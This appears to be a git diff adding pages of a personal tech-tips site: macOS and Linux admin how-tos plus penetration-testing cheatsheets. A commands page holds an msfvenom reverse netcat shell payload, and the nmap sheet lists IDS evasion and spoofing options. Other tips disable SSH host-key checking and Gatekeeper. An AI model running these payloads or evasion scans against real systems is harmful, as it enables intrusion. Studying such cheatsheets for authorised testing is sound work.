+Unattended-Upgrade::InstallOnShutdown "false";
+//Unattended-Upgrade::Mail "";
+//Unattended-Upgrade::MailReport "on-change";
+Unattended-Upgrade::Remove-Unused-Kernel-Packages "true";
+Unattended-Upgrade::Remove-New-Unused-Dependencies "true";
+Unattended-Upgrade::Remove-Unused-Dependencies "true";
+Unattended-Upgrade::Automatic-Reboot "true";
+Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
+Unattended-Upgrade::Automatic-Reboot-Time "06:00";
+// Acquire::http::Dl-Limit "70";
+// Unattended-Upgrade::SyslogEnable "false";
+// Unattended-Upgrade::SyslogFacility "daemon";
+// Unattended-Upgrade::OnlyOnACPower "true";
+// Unattended-Upgrade::Skip-Updates-On-Metered-Connections "true";
+// Unattended-Upgrade::Verbose "false";
+// Unattended-Upgrade::Debug "false";
+// Unattended-Upgrade::Allow-downgrade "false";
+
Automatic call via /etc/apt/apt.conf.d/20auto-upgrades
echo unattended-upgrades unattended-upgrades/enable_auto_updates boolean true | sudo debconf-set-selections
+sudo dpkg-reconfigure -f noninteractive unattended-upgrades
+
Check the /etc/apt/apt.conf.d/20auto-upgrades for those 2 lines:
APT::Periodic::Update-Package-Lists "1" ;
+APT::Periodic::Unattended-Upgrade "1" ;
+
Manual Run:
sudo unattended-upgrade -d
+
To enable unattended-upgrade use the following command:
sudo dpkg-reconfigure --priority= low unattended-upgrades
+
Back to top
\ No newline at end of file
diff --git a/logo.jpg b/logo.jpg
new file mode 100644
index 000000000..973a5d0e4
Binary files /dev/null and b/logo.jpg differ
diff --git a/logo/chart-donut-variant.png b/logo/chart-donut-variant.png
new file mode 100644
index 000000000..2d9549e62
Binary files /dev/null and b/logo/chart-donut-variant.png differ
diff --git a/logo/chart-donut-variant.svg b/logo/chart-donut-variant.svg
new file mode 100644
index 000000000..de2d79534
--- /dev/null
+++ b/logo/chart-donut-variant.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/logo/chart-donut-variant_transperent.png b/logo/chart-donut-variant_transperent.png
new file mode 100644
index 000000000..84312f36d
Binary files /dev/null and b/logo/chart-donut-variant_transperent.png differ
diff --git a/mac-os/applications-tweaks/index.html b/mac-os/applications-tweaks/index.html
new file mode 100644
index 000000000..7305b7a5d
--- /dev/null
+++ b/mac-os/applications-tweaks/index.html
@@ -0,0 +1,169 @@
+ Applications Tweaks - 3os macOS Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-06-25 Applications Tweaks Running Multi Instances of an Application Launch the Script Editor choose temporary folder
Copy the command to be executed to the Script Editor
do shell script "open -n <path to application>"
+
Example
do shell script "open -n /Applications/'Visual Studio Code.app'"
File > Export
Use the following settings:
Export As: Your New Application Name Where: Applications File Format: Application Change The Icon of Your New Application:
In Finder got to Applications folder. Right Click on the new Your New Application application we just created and click Get Info . Drug the original application icon (or any other) to the in the left corner of the "get info" menu.
Lunch Firefox Profile Manager as Application Launch the Script Editor choose temporary folder
Copy the command to be executed to the Script Editor
do shell script "/Applications/Firefox.app/Contents/MacOS/firefox -ProfileManager &> /dev/null &"
+
File > Export
Use the following settings:
Save As: Firefox Profile Manager Where: Applications File Format: Application Change The Icon of Your New Firefox Profile Manager Application:
In Finder got to Applications folder. Right Click on the new Firefox Profile Manager application we just created and click Get Info . Drug the original application to the icon in the left corner of the "get info" menu.
Back to top
\ No newline at end of file
diff --git a/mac-os/enable-root-user/index.html b/mac-os/enable-root-user/index.html
new file mode 100644
index 000000000..4493a24aa
--- /dev/null
+++ b/mac-os/enable-root-user/index.html
@@ -0,0 +1,167 @@
+ Enable Root User - 3os macOS Authors: fire1ce | Created: 2022-06-18 | Last update: 2022-06-19 Enable or Disable the Root User on macOS Mac administrators can use the root user account to perform tasks that require access to more areas of the system.
The user account named â€root†is a superuser with read and write privileges to more areas of the system, including files in other macOS user accounts. The root user is disabled by default. If you can log in to your Mac with an administrator account, you can enable the root user, then log in as the root user to complete your task.
How to Enable the Root User System Preferences
> Users & Groups
Click lock
icon, enter an administrator name and password. Click Login Options
. Click Join
at Newotk Account Server
.
Click Open Directory Utility
.
Click lock icon in the Directory Utility window, then enter an administrator name and password.
From the menu bar in Directory Utility: Choose Edit > Enable Root User, then enter the password that you want to use for the root user. Or choose Edit > Disable Root User.
How to Disable the Root User To Disable the Root User repeat the steps above, but change the last step to Disable Root User.
Login as The Root User When the root user is enabled, you have the privileges of the root user only while logged in as the root user.
Logout of your current account, then log in as the root user. user name â€root†and the password you created for the root user.
Back to top
\ No newline at end of file
diff --git a/mac-os/homebrew/brewup/index.html b/mac-os/homebrew/brewup/index.html
new file mode 100644
index 000000000..5c13e2be5
--- /dev/null
+++ b/mac-os/homebrew/brewup/index.html
@@ -0,0 +1,175 @@
+ BrewUp - 3os macos homebrew bash github Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 BrewUp
Description Brewup script is a Bash script that uses Homebrew - The Missing Package Manager for macOS as it's base. Brewup uses GitHub as a "backup" of a config file which contains all installed Taps, Formulas, Casks and App Store Apps at your macOS. It also allows the use of Github main function of retaining changes so you can always look up for the package that were installed sometime ago and you just forgot what is was exactly.
Visit as at 3os.org for more guides and tips for macOS
What Brewup Actually Does It just runs few Brew functionality automatically:
brew doctor brew missing brew upgrade brew cask upgrade brew cleanup App Store Updates Creating Updated Brewfile Pushing changes to Git Requirements Installing Use this repository as template, it will create a Fork
for you and you can start using it.
git clone <paste the your repo url here>
+
sudo ln -s ${ PWD } /BrewUp/brewup.sh /usr/local/bin/brewup
+
Note: if /usr/local/bin/
is missing create it with
sudo mkdir /usr/local/bin/
+
Usage just run from terminal:
Install all apps from BrewFile:
cd to local location you cloned your repository and run:
brew bundle install --file= <BrewFile Name>
+
License MIT License Copyright © Stas Kosatuhin @2019
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/mac-os/homebrew/homebrew-snippets/index.html b/mac-os/homebrew/homebrew-snippets/index.html
new file mode 100644
index 000000000..e6ab10226
--- /dev/null
+++ b/mac-os/homebrew/homebrew-snippets/index.html
@@ -0,0 +1,173 @@
+ Brew Snippets - 3os macOS homebrew Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-06-18 Brew Snippets Brew Pinns - Freez and Unfreez Specific Packages This will alow you to pin (freez update) to specific packages to your Homebrew installation and then unfreeze them.
List of packages that you freeze
Freeze Version
Unfreeze Version
Uninstall Brew Package and Dependencies Remove package's dependencies (does not remove package):
brew deps [ FORMULA] | xargs brew remove --ignore-dependencies
+
Remove package:
Reinstall missing libraries:
brew missing | cut -d: -f2 | sort | uniq | xargs brew install
+
Back to top
\ No newline at end of file
diff --git a/mac-os/import-ssh-keys-keychain/index.html b/mac-os/import-ssh-keys-keychain/index.html
new file mode 100644
index 000000000..945fc7ad5
--- /dev/null
+++ b/mac-os/import-ssh-keys-keychain/index.html
@@ -0,0 +1,178 @@
+ SSH Passphrase to Keychain - 3os macos Authors: fire1ce | Created: 2022-06-18 | Last update: 2023-01-17 Import ed25519/RSA Keys Passphrase to macOS Keychain First, you need to add the keys to the keychain
with the following steps:
Copy your ed25519, ed25519.pub
/ id_rsa, id_rsa.pub
to ~/.ssh/
folder
Store the key in the MacOS Keychain
Enter your key passphrase. You won't be asked for it again.
List all keys in the keychain:
If you haven't already, create an ~/.ssh/config
file. In other words, in the .ssh directory in your home dir, make a file called config.
At ~/.ssh/config
file, add the following lines at the top of the config:
Store the key in the MacOS Keychain
The UseKeychain yes is the key part, which tells SSH to look in your macOS keychain for the key passphrase.
That's it! Next time you load any ssh connection, it will try the private keys you've specified, and it will look for their passphrase in the macOS keychain. No passphrase typing required.
Back to top
\ No newline at end of file
diff --git a/mac-os/python/pyenv-virtualenv/index.html b/mac-os/python/pyenv-virtualenv/index.html
new file mode 100644
index 000000000..534031b24
--- /dev/null
+++ b/mac-os/python/pyenv-virtualenv/index.html
@@ -0,0 +1,202 @@
+ Pyenv-virtualenv Multi Version - 3os maco python Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Pyenv-virtualenv - Multiple Version Python Virtual Environment Manager For easy non-multiple version Python Virtual Environment follow this Venv Python Virtual Environment
Intro Using and developing with Python on macOS sometimes may be frustrating...
The reason for that is that macOS uses Python 2 for its core system with pip as a package manager. When Xcode Command Line Tools are installed Python 3 and pip3 package manager will be available at the cli. When using Python2, Python3 and their package managers this way, all the packages will be installed at the system level and my effect the native packages and their dependences , this can break or lead to unwanted bugs in OS.
The right way to use python at macOS is to use Virtual Environments for python. This way all the system related versions of python and their packages won't be affected and use by you.
Installing and configuring pyenv, pyenv-virtualenv In order to use pyenv, pyenv-virtualenv without conflicting with the native macOS python we need to add some configuration to our ~/.zshrc config (for mac os catalina) or your bash config if you are still using bash.
It's very imported to maintain the order of the configuration for the loading order
First of all we need to include your Executable Paths. In the example we added all the common paths, including the paths for pyenv, pyenv-virtualenv. If you have any other path that you use, you can add them at the same line or create a new line below this one. Second to Executable Paths we will add two if statements that will check if the pyenv,pyenv-virtualenv are installed, if they are it will load them. If they aren't and you are using the same zsh or bash config it will ignore loading them Third is a fix for brew, brew doctor . When using this method it may conflict with brew as it uses python as well. If you run run brew doctor without the fix, it will show config warnings related to the python configuration files. Configuration for ~/.zshrc or ~/.zprofile
# Executable Paths
+## Global
+export PATH="/usr/local/bin:/usr/local/sbin:/Users/${USER}/.local/bin:/usr/bin:/usr/sbin:/bin:/sbin:$PATH"
+
+## Curl
+export PATH="/opt/homebrew/opt/curl/bin:$PATH"
+export LDFLAGS="-L/opt/homebrew/opt/curl/lib"
+export CPPFLAGS="-I/opt/homebrew/opt/curl/include"
+export PKG_CONFIG_PATH="/opt/homebrew/opt/curl/lib/pkgconfig"
+
+# pyenv, pyenv-virtualenv
+## Initiating pyenv and fix Brew Doctor: "Warning: "config" scripts exist outside your system or Homebrew directories"
+if which pyenv >/dev/null; then
+ eval "$(pyenv init --path)"
+ alias brew='env PATH=${PATH//$(pyenv root)\/shims:/} brew'
+fi
+
+## Initiating pyenv-virtualenv
+if which pyenv-virtualenv-init >/dev/null; then
+ eval "$(pyenv virtualenv-init -)"
+fi
+
After you saved your configuration the best way to load it is to close your terminal session and open it again. This will load the session with your updated configuration. There should be no errors at the new session.
This will install both pyenv and pyenv-virtualenv
brew install pyenv-virtualenv
+
Test if pyenv loaded currently
After the installation we would like to set a system level python version, you can chose the default from the list available from the pyenv
List available Python Version and find the version suited for your needs:
Install Requeued Python Version (Exmaple version 3.9.5) as a default system
Set it as global
You can install multiply versions of python at the same time.
List all installed python versions and virtual environments and their python versions
Now let's test our system Python version we set before, it should be the version you choose as Global before
So far we cleaned your system and installed and configured pyenv, pyenv-virtualenv.
How to use pyenv-virtualenv Now let's understand how to use Python Virtual Environment with pyenv-virtualenv
Full documentation can be found at the original repo at git hub: pyenv-virtualenv github
We will list here some basic examples for a quick start and basic understanding
To create a virtualenv for the Python version used with pyenv, run pyenv virtualenv, specifying the Python version you want and the name of the virtualenv directory. For example,
pyenv virtualenv 3.9.5 my - project - name
+
This will create a virtualenv based on Python 3.9.5 under $(pyenv root)/versions in a folder called my-project-name
Activating virtualenv automatically for project
The best way we found to activate the virtualenv at your project is to link the projects directory to the virtualenv.
cd to the project's directory and link the virtualenv for example my-project-name virtualenv
pyenv local my - project - name
+
This will activate the linked virtualenv every time you cd to this directory automatically From now you can use pip to install any packages you need for your project, the location of the installed packages will be at $(pyenv root)/versions/
Activating virtualenv manually for project
You can also activate and deactivate a pyenv virtualenv manually:
pyenv activate < virtualenv name >
+pyenv deactivate
+
This will alow you to use multiply versions of python or packages for the same project
List existing virtualenvs
Delete existing virtualenv
pyenv uninstall my - virtual - env
+
or
pyenv virtualenv - delete my - virtual - env
+
You and your macOS should be ready for using python the right way without conflicting any system or Xcode Command Line Tools (used by brew)
Back to top
\ No newline at end of file
diff --git a/mac-os/terminal-snippets/index.html b/mac-os/terminal-snippets/index.html
new file mode 100644
index 000000000..8e01dc5af
--- /dev/null
+++ b/mac-os/terminal-snippets/index.html
@@ -0,0 +1,192 @@
+ Terminal Snippets - 3os macos Authors: fire1ce | Created: 2022-06-18 | Last update: 2022-08-02 Terminal Snippets Terminal usage snippets for macOS. This is a collection of snippets that I use without specific category.
Install macOS Updates via CLI Shell Safe rm Source shell-safe-rm github
A much safer replacement of shell rm
with ALMOST FULL features of the origin rm
command.
Initially developed on Mac OS X, then tested on Linux.
Using safe-rm
, the files or directories you choose to remove will move to $HOME/.Trash
instead of simply deleting them. You could put them back whenever you want manually.
If a file or directory with the same name already exists in the Trash, the name of newly-deleted items will be ended with the current date and time.
Install with npm:
Add Alias to your zshrc config
Disable StrictHostKeyChecking in SSH To disable strict host checking on OS X for the current user, create or edit ~/.ssh/ssh_config
and add the following lines:
StrictHostKeyChecking no
+
Set macOS Hostname via CLI sudo scutil --set HostName <NewHostNameHere>
+
Syntax Highlighting for Nano Install Nano from homebrew Create ~/.nanorc
file with the syntax below
brew install nano
+touch ~/.nanorc
+
Edit ~/.nanorc
file with the syntax below
Disable/Enable Gatekeeper Disable Gatekeeper
sudo spctl --master-disable
+
Enable Gatekeeper
sudo spctl --master-enable
+
Check Status
Disable/Enable SIP (System Integrity Protection) Reboot your Mac into Recovery Mode by restarting your computer and holding down Command+R until the Apple logo appears on your screen. Click Utilities > Terminal. In the Terminal window, type in:
Status:
Disable:
Enable:
Press Enter and restart your Mac.
Installing rbenv (ruby send box) - Ruby alternative to the one that macOS uses Install rbenv with brew
Add eval "$(rbenv init -)"
to the end of ~/.zshrc
or ~/.bash_profile
Install a ruby version
Select a ruby version by rbenv
Open a new terminal window
Verify that the right gem folder is being used with gem env home
(should report something in your user folder not system wide)
List listening Ports and Programs and Users (netstat like) sudo lsof -i -P | grep -i "listen"
+
Disable "last login" at Terminal cd ~/
+touch .hushlogin
+
Create he missing /Users/Shared folder
sudo mkdir -p /Users/Shared/
+
Fix permissions for the /Users/Shared folder
sudo chmod -R 1777 /Users/Shared
+
iTerm2 Using Alt/Cmd + Right/Left Arrow in iTerm2
Go to iTerm Preferences
→ Profiles
, select your profile, then the Keys
tab. click Load Preset
... and choose Natural Text Editing
.
Remove the Right Arrow Before the Cursor Line
you can turn it off by going in to Preferences
> Profiles
> (your profile) > Terminal
, scroll down to Shell Integration
, and turn off Show mark indicators
.
Clear Google Drive cache rm -rf ~/Library/Application\ Support/Google/DriveFS/[ 0 -9] *
+
Back to top
\ No newline at end of file
diff --git a/mac-os/touch-id-for-sudo/index.html b/mac-os/touch-id-for-sudo/index.html
new file mode 100644
index 000000000..a2215374e
--- /dev/null
+++ b/mac-os/touch-id-for-sudo/index.html
@@ -0,0 +1,172 @@
+ TouchID for sudo - 3os macOS iTerm2 terminal touchID Authors: fire1ce | Created: 2022-06-19 | Last update: 2022-06-19 TouchID for sudo Apple devices such Macbooks and some Apple Magic Keyboards have a fingerprint - Touch ID scanner that can be used to authenticate a user with a touch of a finger. This functionality isn't available when using sudo
to run commands. You have to enter your password every time you run commands with high privileges.
We can enable TouchID for sudo with a simple config change. This will allow you to use Touch ID to authenticate with sudo
without entering your password including the authentication with Apple Watch.
Display Link - Known Issue
As of the writing of this article, the Display Link Driver will privent the use of Touch ID for sudo when using the Display link device. It will work when the Display Link device isn't connected. This is a known issue.
Enable TouchID for sudo Open in text editor file with sudo privileges /etc/pam.d/sudo
. In the next example we will use the nano
editor.
sudo nano /etc/pam.d/sudo
+
Add at the top of the config file this line:
auth sufficient pam_tid.so
+
Your config should look like this:
Save and Exit.
You can test your TouchID prompt in terminal by opening new session and running:
Enable TouchID Support in iTerm2 In order to enable TouchID support in iTerm2, you need to complete the above section and then follow the steps below:
Go to iTerm2
-> Preferences
-> Advanced
and search for:
Allow session to survive
+
Change Allow session to survive logging out and back in. to No
You can test your TouchID prompt in iTerm2 by opening new session and running:
Back to top
\ No newline at end of file
diff --git a/mac-os/ui-tweaks/index.html b/mac-os/ui-tweaks/index.html
new file mode 100644
index 000000000..145d003c8
--- /dev/null
+++ b/mac-os/ui-tweaks/index.html
@@ -0,0 +1,179 @@
+ UI Tweaks - 3os macOS Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-06-18 UI Tweaks Hide All The Icons On Your Desktop Disable Icons:
defaults write com.apple.finder CreateDesktop false
+killall Finder
+
Enable Icons:
defaults write com.apple.finder CreateDesktop true
+killall Finder
+
Change the Launchpad Grid Layout Change the springboard-columns and springboard-rows values according to your preference
defaults write com.apple.dock springboard-columns -int 8
+defaults write com.apple.dock springboard-rows -int 6
+defaults write com.apple.dock ResetLaunchPad -bool TRUE
+killall Dock
+
Reset Launchpad Icons Sort defaults write com.apple.dock ResetLaunchPad -bool true; killall Dock
+
Set the Same View Options
for all Finder windows First, we want to set the default view options for all new Finder windows. To do so, open Finder and click on the view setting that you want to use. The settings are four icons and the top of your Finder window. If you don't see the Finder toolbar type:
After selecting the option you want, type:
to open the view options window.
Make sure you check the top two checkboxes that say Always open in list view and Browse in list view. Keep in mind it will reflect whichever view you've selected.
Now click the button at the bottom that says "Use as Defaults".
Delete all .DS_Store files on your computer Chances are you've opened some Finder windows in the past. Individual folder options will override this default setting that we just set.
In order reset your folder settings across the entire machine we have to delete all .DS_Store files. This will ensure that all folders start fresh. Open up the Terminal application (Applications/Utilities/Terminal), and type:
sudo find / -name .DS_Store -delete 2 >/dev/null ; killall Finder
+
Note: In the future, whenever you switch views, it will automatically save in the new .DS_Store file. This will override the default settings.
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/cli-commands-collation/index.html b/penetration-testing/cheatsheets/cli-commands-collation/index.html
new file mode 100644
index 000000000..3cfa4ad86
--- /dev/null
+++ b/penetration-testing/cheatsheets/cli-commands-collation/index.html
@@ -0,0 +1,172 @@
+ Cli Commands Collation - 3os pt penetration-testing cli commands collation Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-08-05 Cli Commands Collation Find PTR Owner - Reversal Look Up dig 0 .168.192.in-addr.arpa. NS
+
Listent for Ping/icmp on interface sudo tcpdump ip proto \\ icmp -i eth0
+
Reverse Netcat Shell Payload R(row)
msfvenom -p cmd/unix/reverse_netcat lhost = 10 .11.19.49 lport = 4444 R
+
listener:
NFS Show Mount showmount -e 10 .10.87.232
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/gobuster-cheatsheet/index.html b/penetration-testing/cheatsheets/gobuster-cheatsheet/index.html
new file mode 100644
index 000000000..1c003965f
--- /dev/null
+++ b/penetration-testing/cheatsheets/gobuster-cheatsheet/index.html
@@ -0,0 +1,176 @@
+ Gobuster CheatSheet - 3os penetration-testing tools cheatsheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Gobuster CheatSheet Common Gobuster Commands dir Mode gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt
+
With content length
gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt -l
+
dns Mode gobuster dns -d example.com -t 50 -w common-names.txt
+
gobuster dns -d example.com-w ~/wordlists/subdomains.txt
+
With Show IP
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i
+
Base domain validation warning when the base domain fails to resolve
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i
+
Wildcard DNS is also detected properly:
gobuster dns -d 0 .0.1.xip.io -w ~/wordlists/subdomains.txt
+
vhost Mode gobuster vhost -u https://example.com -w common-vhosts.txt
+
s3 Mode
gobuster s3 -w bucket-names.txt
+
Available Modes Switch Description dir the classic directory brute-forcing mode dns DNS subdomain brute-forcing mode s3 Enumerate open S3 buckets and look for existence and bucket listings vhost irtual host brute-forcing mode (not the same as DNS!)
Global Flags Short Switch Long Switch Description -z --no-progress Don't display progress -o --output string Output file to write results to (defaults to stdout) -q --quiet Don't print the banner and other noise -t --threads int Number of concurrent threads (default 10) -i --show-ips Show IP addresses --delay duration DNS resolver timeout (default 1s) -v, --verbose Verbose output (errors) -w --wordlist string Path to the wordlist
DNS Mode Options Short Switch Long Switch Description -h, --help help for dns -d, --domain string The target domain -r, --resolver string Use custom DNS server (format server.com or server.com:port) -c, --show-cname Show CNAME records (cannot be used with '-i' option) -i, --show-ips Show IP addresses --timeout duration DNS resolver timeout (default 1s)
DIR Mode Options Short Switch Long Switch Description -h, --help help for dir -f, --add-slash Append / to each request -c, --cookies string Cookies to use for the requests -e, --expanded Expanded mode, print full URLs -x, --extensions string File extension(s) to search for -r, --follow-redirect Follow redirects -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -l, --include-length Include the length of the body in the output -k, --no-tls-validation Skip TLS certificate verification -n, --no-status Don't print status codes -P, --password string Password for Basic Auth -p, --proxy string Proxy to use for requests [http(s)://host:port] -s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403") -b, --status-codes-blacklist string Negative status codes (will override status-codes if set) --timeout duration HTTP Timeout (default 10s) -u, --url string The target URL -a, --useragent string Set the User-Agent string (default "gobuster/3.1.0") -U, --username string Username for Basic Auth -d, --discover-backup Upon finding a file search for backup files --wildcard Force continued operation when wildcard found
vhost Mode Options Short Switch Long Switch Description -h --help help for vhost -c --cookies string Cookies to use for the requests -r --follow-redirect Follow redirects -H --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -k --no-tls-validation Skip TLS certificate verification -P --password string Password for Basic Auth -p --proxy string Proxy to use for requests [http(s)://host:port] --timeout duration HTTP Timeout (default 10s) -u --url string The target URL -a --useragent string Set the User-Agent string (default "gobuster/3.1.0") -U --username string Username for Basic Auth
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/nmap-cheatsheet/index.html b/penetration-testing/cheatsheets/nmap-cheatsheet/index.html
new file mode 100644
index 000000000..93eb066fb
--- /dev/null
+++ b/penetration-testing/cheatsheets/nmap-cheatsheet/index.html
@@ -0,0 +1,180 @@
+ Nmap CheatSheet - 3os penetration-testing tools cheatsheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Nmap CheatSheet Common Nmap Commands Aggressive scan, single host, TCP SYN, :
nmap -n -sS -p- -T4 -Pn -A -v 192 .168.1.1
+
Ping Scan - Host discovery in subnet
nmap -sn -v 192 .168.0.0/24
+
Target Specification Switch Description Example nmap 192.168.1.1 Scan a single IP nmap 192.168.1.1 192.168.2.1 Scan specific IPs nmap scanme.nmap.org Scan a range nmap scanme.nmap.org Scan a domain nmap 192.168.1.0/24 Scan using CIDR notation -iL nmap -iL targets.txt Scan targets from a file -iR nmap -iR 100 Scan 100 random hosts --exclude nmap --exclude 192.168.1.1 Exclude listed hosts
Scan Techniques Switch Example Description -sS nmap 192.168.1.1 -sS TCP SYN port scan (Default) -sT nmap 192.168.1.1 -sT TCP connect port scan (Default without root privilege) -sU nmap 192.168.1.1 -sU UDP port scan -sA nmap 192.168.1.1 -sA TCP ACK port scan -sW nmap 192.168.1.1 -sW TCP Window port scan -sM nmap 192.168.1.1 -sM TCP Maimon port scan
Host Discovery Switch Description Example -sL nmap 192.168.1.1-3 -sL No Scan. List targets only -sn nmap 192.168.1.1/24 -sn Disable port scanning. Host discovery only. -Pn nmap 192.168.1.1-5 -Pn Disable host discovery. Port scan only. -PS nmap 192.168.1.1-5 -PS22-25,80 TCP SYN discovery on port x.Port 80 by default -PA nmap 192.168.1.1-5 -PA22-25,80 TCP ACK discovery on port x.Port 80 by default -PU nmap 192.168.1.1-5 -PU53 UDP discovery on port x.Port 40125 by default -PR nmap 192.168.1.1-1/24 -PR ARP discovery on local network -n nmap 192.168.1.1 -n Never do DNS resolution
Port Specification Switch Description Example -p nmap 192.168.1.1 -p 21 Port scan for port x -p nmap 192.168.1.1 -p 21-100 Port range -p nmap 192.168.1.1 -p U:53,T:21-25,80 Port scan multiple TCP and UDP ports -p nmap 192.168.1.1 -p- Port scan all ports -p nmap 192.168.1.1 -p http,https Port scan from service name -F nmap 192.168.1.1 -F Fast port scan (100 ports) --top-ports nmap 192.168.1.1 --top-ports 2000 Port scan the top x ports -p-65535 nmap 192.168.1.1 -p-65535 Leaving off initial port in range makes the scan start at port 1 -p0- nmap 192.168.1.1 -p0- Leaving off end port in rangemakes the scan go through to port 65535
Service and Version Detection Switch Description Example -sV nmap 192.168.1.1 -sV Attempts to determine the version of the service running on port -sV --version-intensity nmap 192.168.1.1 -sV --version-intensity 8 Intensity level 0 to 9. Higher number increases possibility of correctness -sV --version-light nmap 192.168.1.1 -sV --version-light Enable light mode. Lower possibility of correctness. Faster -sV --version-all nmap 192.168.1.1 -sV --version-all Enable intensity level 9. Higher possibility of correctness. Slower -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute
OS Detection Switch Description Example -O nmap 192.168.1.1 -O Remote OS detection using TCP/IP stack fingerprinting -O --osscan-limit nmap 192.168.1.1 -O --osscan-limit If at least one open and one closed TCP port are not found it will not try OS detection against host -O --osscan-guess nmap 192.168.1.1 -O --osscan-guess Makes Nmap guess more aggressively -O --max-os-tries nmap 192.168.1.1 -O --max-os-tries 1 Set the maximum number x of OS detection tries against a target -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute
Switch Description Example -T0 nmap 192.168.1.1 -T0 Paranoid (0) Intrusion DetectionSystem evasion -T1 nmap 192.168.1.1 -T1 Sneaky (1) Intrusion Detection Systemevasion -T2 nmap 192.168.1.1 -T2 Polite (2) slows down the scan to useless bandwidth and use less target machine resources -T3 nmap 192.168.1.1 -T3 Normal (3) which is default speed -T4 nmap 192.168.1.1 -T4 Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network -T5 nmap 192.168.1.1 -T5 Insane (5) speeds scan; assumes you are on an extraordinarily fast network -------- -------- ------------------------------------------------------------------------------------------- --host-timeout 1s; 4m; 2h Give up on target after this long --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout 1s; 4m; 2h Specifies probe round trip time --min-hostgroup/max-hostgroup <size 50; 1024 Parallel host scan group sizes --min-parallelism/max-parallelism 10; 1 Probe parallelization --scan-delay/--max-scan-delay 20ms; 2s; 4m; 5h Adjust delay between probes --max-retries 3 Specify the maximum number of port scan probe retransmissions --min-rate 100 Send packets no slower than per second --max-rate 100 Send packets no faster than per second
NSE Scripts Switch Description Example -sC nmap 192.168.1.1 -sC Scan with default NSE scripts. Considered useful for discovery and safe --script default nmap 192.168.1.1 --script default Scan with default NSE scripts. Considered useful for discovery and safe --script nmap 192.168.1.1 --script=banner Scan with a single script. Example banner --script nmap 192.168.1.1 --script=http* Scan with a wildcard. Example http --script nmap 192.168.1.1 --script=http,banner Scan with two scripts. Example http and banner --script nmap 192.168.1.1 --script "not intrusive" Scan default, but remove intrusive scripts --script-args nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1 NSE script with arguments
Useful NSE Script Examples Command Description nmap -Pn --script=http-sitemap-generator scanme.nmap.org http site map generator nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 Fast search for random web servers nmap -Pn --script=dns-brute domain.com Brute forces DNS hostnames guessing subdomains nmap -n -Pn -vv -O -sV --script smb-enum,smb-ls,smb-mbenum,smb-os-discovery,smb-s ,smb-vuln,smbv2 -vv 192.168.1.1 Safe SMB scripts to run nmap --script whois* domain.com Whois query nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org Detect cross site scripting vulnerabilities nmap -p80 --script http-sql-injection scanme.nmap.org Check for SQL injections
Firewall / IDS Evasion and Spoofing Switch Description Example -f nmap 192.168.1.1 -f Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters --mtu nmap 192.168.1.1 --mtu 32 Set your own offset size -D nmap -D 192.168.1.101,192.168.1.102, 192.168.1.103,192.168.1.23 192.168.1.1 Send scans from spoofed IPs -D nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip Above example explained -S nmap -S www.microsoft.com www.facebook.com Scan Facebook from Microsoft (-e eth0 -Pn may be required) -g nmap -g 53 192.168.1.1 Use given source port number --proxies nmap --proxies http://192.168.1.1:8080
, http://192.168.1.2:8080
192.168.1.1 Relay connections through HTTP/SOCKS4 proxies --data-length nmap --data-length 200 192.168.1.1 Appends random data to sent packets
Example IDS Evasion command nmap -f -t 0 -n -Pn –data-length 200 -D 192 .168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192 .168.1.1
+
